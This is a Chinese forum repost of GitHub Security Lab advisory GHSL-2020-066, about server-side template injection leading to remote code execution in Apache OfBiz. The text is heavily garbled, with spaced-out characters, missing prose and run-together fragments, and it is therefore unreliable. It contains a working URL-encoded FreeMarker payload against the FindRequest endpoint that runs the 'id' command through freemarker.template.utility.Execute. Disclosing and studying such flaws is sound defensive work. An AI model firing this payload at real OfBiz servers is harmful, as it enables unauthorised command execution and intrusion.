搜索

[28740] 2021-01-27_GHSL-2020-066:服务器端模板注入(SSTI)导致ApacheOfBiz中的远程代码执行(RCE)

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2021-01-27_GHSL-2020-066:服务器端模板注入(SSTI)导致ApacheOfBiz中的远程代码执行(RCE) G H S L - 2 0 2 0 - 0 6 6 S S T I A p a c h e   O f B i z R C E A l v a r o   M u n o z   O t s   2 0 2 1 - 0 1 - 2 7 2 0 2 0 4 1 3 2 0 2 0 4 2 3 O f B i z 2 0 2 0 4 2 3 A p a c h e X S S G H S L - 2 0 2 0 - 0 6 8 X S S C V E 2 0 1 / 0 1 / 1 0   / 1 7 . 1 2 . 0 5 A p a c h e   O f B i z S S T I R C E a p a c h e 1 7 . 1 2 . 0 1   2 0 1 6 S S T I C V E - 2 0 1 6 - 4 4 6 2 使 F r e e M a r k e r S S T I 使 O f B i z R C E r e n d e r S o r t F i e l d l i n k U r l   =   U R L E n c o d e r . e n c o d e ( l i n k U r l ,   " U T F - 8 " ) ; s r . a p p e n d ( " "   l i n k U r l = r " " ) ; r a w   s t r i n g
使   i d h t t p s : / / l o c a l h o s t / o r d e r m g r / c o n t r o l / F i n d R e q u e s t ? f o o = b a r % 2 2 a j a x E n a b l e d = f a l s e / % 3 E % 2 4 % 7 b % 2 2 f r e e m a r k e r % 2 e t e m p l a t e % 2 e u t i l i t y % 2 e E x e c u t e % 2 2 % 3 f n e w % 2 8 % 2 9 % 2 8 % 2 2 i d % 2 2 % 2 9 % 7 d % 3 C F O O R e m o t e   C o d e   E x e c u t i o n
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理